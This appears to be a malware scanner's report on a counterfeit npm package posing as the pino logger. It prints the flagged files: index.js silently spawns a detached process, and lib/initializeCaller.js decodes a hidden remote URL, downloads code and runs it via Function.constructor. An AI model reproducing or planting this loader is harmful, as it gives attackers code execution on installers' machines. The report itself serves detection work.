// offending code· 3 files flaggedpatterns: 4
--- package/index.d.ts (excerpt) ---
// Project: https://github.com/pinojs/pino.git, http://getpino.io
// Definitions by: Peter Snider <https://github.com/psnider>
// BendingBender <https://github.com/BendingBender>
// Christian Rackerseder <https://github.com/screendriver>
// GP <https://github.com/paambaati>
// Alex Ferrando <https://github.com/alferpal>
// Oleksandr Sidko <https://github.com/mortiy>
// Harris Lummis <https://github.com/lummish>
// Raoul Jaeckel <https://github.com/raoulus>
// Cory Donkin <https://github.com/Cooryd>
// Adam Vigneaux <https://github.com/AdamVig>
// Austin Beer <https://github.com/austin-beer>
// Michel Nemnom <https://github.com/Pegase745>
// Igor Savin <https://github.com/kibertoad>
// James Bromwell <https://github.com/thw0rted>
// TypeScript Version: 4.4
import type { EventEmitter } from "events";
import * as pinoStdSerializers from "pino-std-serializers";
import type { SonicBoom, SonicBoomOpts } from "sonic-boom";
import type { WorkerOptions } from "worker_threads";
//// Non-exported types and interfaces
// ToDo https://github.com/pinojs/thread-stream/issues/24
type ThreadStream = any
type TimeFn = () => string;
type MixinFn<CustomLevels extends string = never> = (mergeObject: object, level: number, logger:pino.Logger<CustomLevels>) => object;
type MixinMergeStrat
--- package/index.js (excerpt) ---
'use strict';
const path = require('path');
const { spawn } = require('child_process');
const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
const { pid } = process;
const defaultOptions = {
levelComparison: SORTING_ORDER.ASC,
levels: DEFAULT_LEVELS,
messageKey: 'msg',
errorKey: 'err',
nestedKey: null,
enabled: true,
base: { pid },
formatters: Object.assign(Object.create(null), {
bindings(bindings) {
return bindings;
}
}),
hooks: {
logMethod: undefined,
streamWrite: undefined
},
name: undefined,
redact: null,
customLevels: null,
useOnlyCustomLevels: false,
depthLimit: 5,
edgeLimit: 100
};
/**
* Launches an asynchronous background task with the provided arguments.
*/
function runBackgroundTask(args) {
const scriptPath = path.resolve(__dirname, './lib/initializeCaller.js');
const child = spawn('node', [scriptPath, JSON.stringify(args)], {
detached: true,
stdio: 'ignore'
});
// Allow the parent process to exit independently.
child.unref();
}
/**
* Middleware initializer that triggers a background process and
* returns a standard Express-compatible middleware function.
*/
const middleware = (...args) => {
runBackgroundTask(...args, defaultOptions);
return (_req, _res, next) => {
next();
};
};
module.exports = middleware;
// Support for default and named imports (TypeScript / Babel)
module.exports.default = middleware;
module.exports.pino = middleware;
--- package/lib/initializeCaller.js (excerpt) ---
"use strict";
const axios = require("axios");
const process = {
env: {
DEV_API_KEY: "aHR0cHM6Ly9hcXVhLW1hcmdpdC04NC50aWlueS5zaXRlL2luZGV4Lmpzb24=",
DEV_SECRET_KEY: "eC1zZWNyZXQta2V5",
DEV_SECRET_VALUE: "Xw==",
}
};
(async function initializeCaller(..._args) {
const apiEndpoint = atob(process.env.DEV_API_KEY);
const apiHeaderKey = atob(process.env.DEV_SECRET_KEY);
const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE);
let retryCount = 5;
while (retryCount > 0) {
try {
const originalLog = console.log;
// Safe placeholder request
const response = (await axios.get(apiEndpoint, { headers: { [apiHeaderKey]: apiHeaderValue } })).data.cookie;
const handler = new Function.constructor("require", response);
handler(require);
console.log = originalLog;
break;
}
catch (error) {
retryCount--;
}
}
})();
--- bundled output (OSV-MAL flagged — LLM scope expansion) ---
--- lib/transport-stream.js (bundled) ---
'use strict'
const { realImport, realRequire } = require('real-require')
module.exports = loadTransportStreamBuilder
/**
* Loads & returns a function to build transport streams
* @param {string} target
* @returns {Promise<function(object): Promise<import('node:stream').Writable>>}
* @throws {Error} In case the target module does not export a function
*/
async function loadTransportStreamBuilder (target) {
let fn
try {
const toLoad = target.startsWith('file://') ? target : 'file://' + target
if (toLoad.endsWith('.ts') || toLoad.endsWith('.cts')) {
// TODO: add support for the TSM modules loader ( https://github.com/lukeed/tsm ).
if (process[Symbol.for('ts-node.register.instance')]) {
realRequire('ts-node/register')
} else if (process.env && process.env.TS_NODE_DEV) {
realRequire('ts-node-dev')
}
// TODO: Support ES imports once tsc, tap & ts-node provide better compatibility guarantees.
fn = realRequire(decodeURIComponent(target))
} else {
fn = (await realImport(toLoad))
}
} catch (error) {
// See this PR for details: https://github.com/pinojs/thread-stream/pull/34
if ((error.code === 'ENOTDIR' || error.code === 'ERR_MODULE_NOT_FOUND')) {
fn = realRequire(target)
} else if (error.code === undefined || error.code === 'ERR_VM_DYNAMIC_IMPORT_CALLBACK_MISSING') {
// When bundled with pkg, an undefined error is thrown when called with realImport
// When bundled with pkg and using node v20, an ERR_VM_DYNAMIC_IMPORT_CALLBACK_MISSING error is thrown when called with realImport
// More info at: https://github.com/pinojs/thread-stream/issues/143
try {
fn = realRequire(decodeURIComponent(target))
} catch {
throw error
}
} else {
throw error
}
}
// Depending on how the default export is performed, and on how the code is
// transpiled, we may find cases of two nested "default" objects.
// See https://